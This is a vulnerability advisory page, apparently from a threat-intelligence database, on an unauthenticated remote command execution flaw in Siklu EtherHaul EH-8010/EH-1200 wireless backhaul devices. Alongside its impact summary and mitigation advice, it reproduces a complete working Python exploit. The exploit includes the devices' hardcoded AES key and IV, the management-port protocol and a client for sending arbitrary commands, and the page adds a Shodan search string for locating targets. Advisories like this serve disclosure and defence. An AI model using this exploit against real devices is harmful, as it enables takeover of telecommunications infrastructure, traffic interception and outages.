Siklu EtherHaul Series EH-8010 - Remote Command Execution
The Siklu EtherHaul Series EH-8010 devices are vulnerable to a remote command execution (RCE) exploit that allows attackers to execute arbitrary commands on the affected device remotely. This vulnerability is exploitable via the device's web interface or network services, enabling unauthorized control without requiring user interaction or authentication. Exploit code is publicly available in Python, increasing the risk of exploitation. Although no known exploits are currently observed in the wild, the presence of exploit code and the nature of the vulnerability pose a significant threat. The vulnerability affects network infrastructure devices commonly used for high-capacity wireless backhaul, which are critical for telecommunications and enterprise networks. European organizations relying on Siklu EtherHaul devices for network connectivity could face confidentiality, integrity, and availability risks if exploited. Mitigation is complicated by the absence of official patches, requiring network segmentation, access controls, and monitoring to reduce exposure. Countries with significant telecommunications infrastructure deployments and strategic importance in Europe are at higher risk. Given the ease of exploitation and potential impact, the severity is assessed as high.
AI Analysis
Technical Summary
The Siklu EtherHaul Series EH-8010, a line of high-capacity wireless backhaul devices used in telecommunications and enterprise networks, is affected by a remote command execution vulnerability. This security flaw allows an attacker to remotely execute arbitrary commands on the device without authentication or user interaction, leveraging weaknesses in the device's web interface or network services. The exploit is publicly available as Python code, facilitating weaponization by attackers. The vulnerability can lead to full compromise of the device, enabling attackers to disrupt network operations, intercept or manipulate traffic, and potentially pivot to other internal systems. Although no official patches or updates have been released by Siklu at the time of reporting, the exploit code's availability increases the urgency for mitigation. The vulnerability's exploitation could severely impact network availability and data confidentiality, especially in environments where these devices serve as critical infrastructure for wireless backhaul. The lack of authentication requirement and remote exploitability make this a high-risk threat. Organizations using these devices must implement compensating controls such as strict network segmentation, firewall rules restricting access to management interfaces, and continuous monitoring for suspicious activity. The exploit's Python implementation indicates ease of use and adaptability for attackers.
Potential Impact
For European organizations, the exploitation of this vulnerability could lead to significant disruptions in network connectivity, particularly for telecommunications providers and enterprises relying on Siklu EtherHaul devices for wireless backhaul. Confidentiality risks include interception or manipulation of sensitive data traversing the compromised devices. Integrity could be compromised by attackers altering device configurations or injecting malicious traffic. Availability is at high risk as attackers could disrupt or disable network links, causing outages or degraded service. The impact extends to critical infrastructure sectors such as telecommunications, finance, government, and utilities, where network reliability is paramount. Given the strategic importance of network infrastructure in Europe and the increasing reliance on wireless backhaul solutions, this vulnerability could facilitate espionage, sabotage, or large-scale denial of service attacks. The absence of patches necessitates immediate mitigation to prevent exploitation and protect sensitive communications and services.
Mitigation Recommendations
1. Immediately restrict access to the management interfaces of Siklu EtherHaul EH-8010 devices by implementing strict firewall rules and network segmentation to limit exposure to trusted administrative networks only.
2. Deploy network intrusion detection and prevention systems (IDS/IPS) to monitor for anomalous traffic patterns or known exploit signatures related to the Python-based RCE exploit.
3. Conduct regular audits of device configurations and logs to detect unauthorized changes or suspicious activities.
4. If possible, isolate vulnerable devices from the internet and untrusted networks to reduce attack surface.
5. Engage with Siklu support channels to obtain any available firmware updates or security advisories and apply patches promptly once released.
6. Implement multi-factor authentication (MFA) and strong password policies for device management interfaces to add layers of defense.
7. Consider deploying compensating controls such as VPNs or secure tunnels for management traffic to protect against interception and unauthorized access.
8. Prepare incident response plans specifically addressing potential exploitation scenarios of these devices.
9. Educate network administrators about the vulnerability and the importance of monitoring and restricting access.
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Sweden, Poland, Belgium, Finland
Indicators of Compromise
- exploit-code (EDB-ID 52466, as published):

```python
# Exploit Title: Siklu EtherHaul Series EH-8010 - Remote Command Execution
# Shodan Dork: "EH-8010" or "EH-1200"
# Date: 2025-08-02
# Exploit Author: semaja2 - Andrew James <semaja2@gmail.com>
# Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon
# Software Link: ftp://ftp.bubakov.net/siklu/
# Version: EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3
# Tested on: Linux
# CVE: CVE-2025-57174
# Blog: https://semaja2.net/2025/08/02/siklu-eh-unauthenticated-rce/

#!/usr/bin/env python3
import argparse, socket, struct
from Crypto.Cipher import AES

# Management service port and fixed 0x90-byte header length used by the device.
PORT = 555
HDR_LEN = 0x90
# Static IV and AES key shared by all affected firmware builds; the session
# derives nothing per-connection, which is what makes unauthenticated access possible.
IV0 = struct.pack('<4I', 0xEA703B82, 0x75A9A17B, 0x1DFC7BB9, 0x55A24D72)
KEY = bytes([
    0x89,0xE7,0xFF,0xBE,0xEB,0x2D,0x73,0xF5,
    0xA9,0x10,0xFC,0x42,0x5B,0x1F,0x36,0x17,
    0x9F,0xB9,0x5E,0x75,0x35,0xA3,0x42,0xA0,
    0x5D,0x02,0x48,0xB1,0x19,0xD2,0x4B,0x82
])

def recv_exact(sock: socket.socket, n: int) -> bytes:
    out = bytearray()
    while len(out) < n:
        chunk = sock.recv(n - len(out))
        if not chunk:
            raise ConnectionError('socket closed')
        out += chunk
    return bytes(out)

def pad16_zero(b: bytes) -> bytes:
    r = len(b) & 0x0F
    return b if r == 0 else (b + b'\x00' * (16 - r))

def hdr_checksum(hdr: bytes) -> int:
    # Byte sum over the header, skipping the 4-byte checksum field at 0x0C.
    return (sum(hdr[0:0x0C]) + sum(hdr[0x10:HDR_LEN])) & 0xFFFFFFFF

def build_header(flag: int, msg: int, payload_len: int) -> bytes:
    hdr = bytearray(HDR_LEN)
    hdr[0] = flag & 0xFF
    hdr[1] = msg & 0xFF
    struct.pack_into('<I', hdr, 0x08, payload_len & 0xFFFFFFFF)
    struct.pack_into('<I', hdr, 0x0C, hdr_checksum(hdr))
    return bytes(hdr)

class RFPipeSession:
    # AES-CBC in both directions; the last ciphertext block is chained as the next IV.
    def __init__(self, key: bytes, iv0: bytes):
        self.key = key
        self.send_iv = iv0
        self.recv_iv = iv0

    def enc_send(self, sock: socket.socket, data: bytes) -> None:
        cipher = AES.new(self.key, AES.MODE_CBC, iv=self.send_iv)
        ct = cipher.encrypt(data)
        self.send_iv = ct[-16:]
        sock.sendall(ct)

    def dec_recv(self, sock: socket.socket, n_plain: int) -> bytes:
        if n_plain <= 0:
            return b''
        n_padded = (n_plain + 15) & ~15
        ct = recv_exact(sock, n_padded)
        cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)
        pt = cipher.decrypt(ct)
        self.recv_iv = ct[-16:]
        return pt[:n_plain]

    def send_header(self, sock: socket.socket, hdr_plain: bytes) -> None:
        if len(hdr_plain) != HDR_LEN:
            raise ValueError('header must be 0x90 bytes')
        self.enc_send(sock, hdr_plain)

    def recv_header(self, sock: socket.socket) -> bytes:
        ct = recv_exact(sock, HDR_LEN)
        cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)
        pt = cipher.decrypt(ct)
        self.recv_iv = ct[-16:]
        return pt

def connect_any(host: str, port: int) -> socket.socket:
    infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM)
    last_err = None
    for fam, st, proto, _, sa in infos:
        s = socket.socket(fam, st, proto)
        try:
            s.connect(sa)
            return s
        except Exception as e:
            last_err = e
            s.close()
    raise ConnectionError(f'connect failed: {last_err}')

def main():
    ap = argparse.ArgumentParser(description='rfpiped command client (msg 0x01)')
    ap.add_argument('target', help='IPv4/IPv6 address')
    ap.add_argument('command', help='command string (e.g., "mo-info system")')
    ap.add_argument('--nul', action='store_true', help='append NUL terminator to command')
    ap.add_argument('--recv', action='store_true', help='receive and print response')
    args = ap.parse_args()

    payload = args.command.encode('utf-8')
    if args.nul:
        payload += b'\x00'

    hdr_plain = build_header(flag=0x00, msg=0x01, payload_len=len(payload))
    sess = RFPipeSession(KEY, IV0)

    with connect_any(args.target, PORT) as s:
        sess.send_header(s, hdr_plain)
        if payload:
            sess.enc_send(s, pad16_zero(payload))
        if args.recv:
            rh = sess.recv_header(s)
            flag = rh[0]
            rmsg = rh[1]
            rlen = struct.unpack_from('<I', rh, 0x08)[0]
            print(f'Response: flag=0x{flag:02x} msg=0x{rmsg:02x} length={rlen}')
            if rmsg in (0x03, 0x05):
                return
            if rlen:
                body = sess.dec_recv(s, rlen)
                if body.endswith(b'\x00'):
                    body = body[:-1]
                try:
                    print(body.decode('utf-8', errors='replace'))
                except Exception:
                    print(body.hex())

if __name__ == '__main__':
    main()
```
Technical Details
- EDB-ID: 52466
- Has exploit code: true
- Code language: Python
Threat ID: 696c9008d302b072d9ad2abb
Added to database: 1/18/2026, 7:47:20 AM
Last enriched: 1/18/2026, 7:48:02 AM
Last updated: 1/18/2026, 2:31:08 PM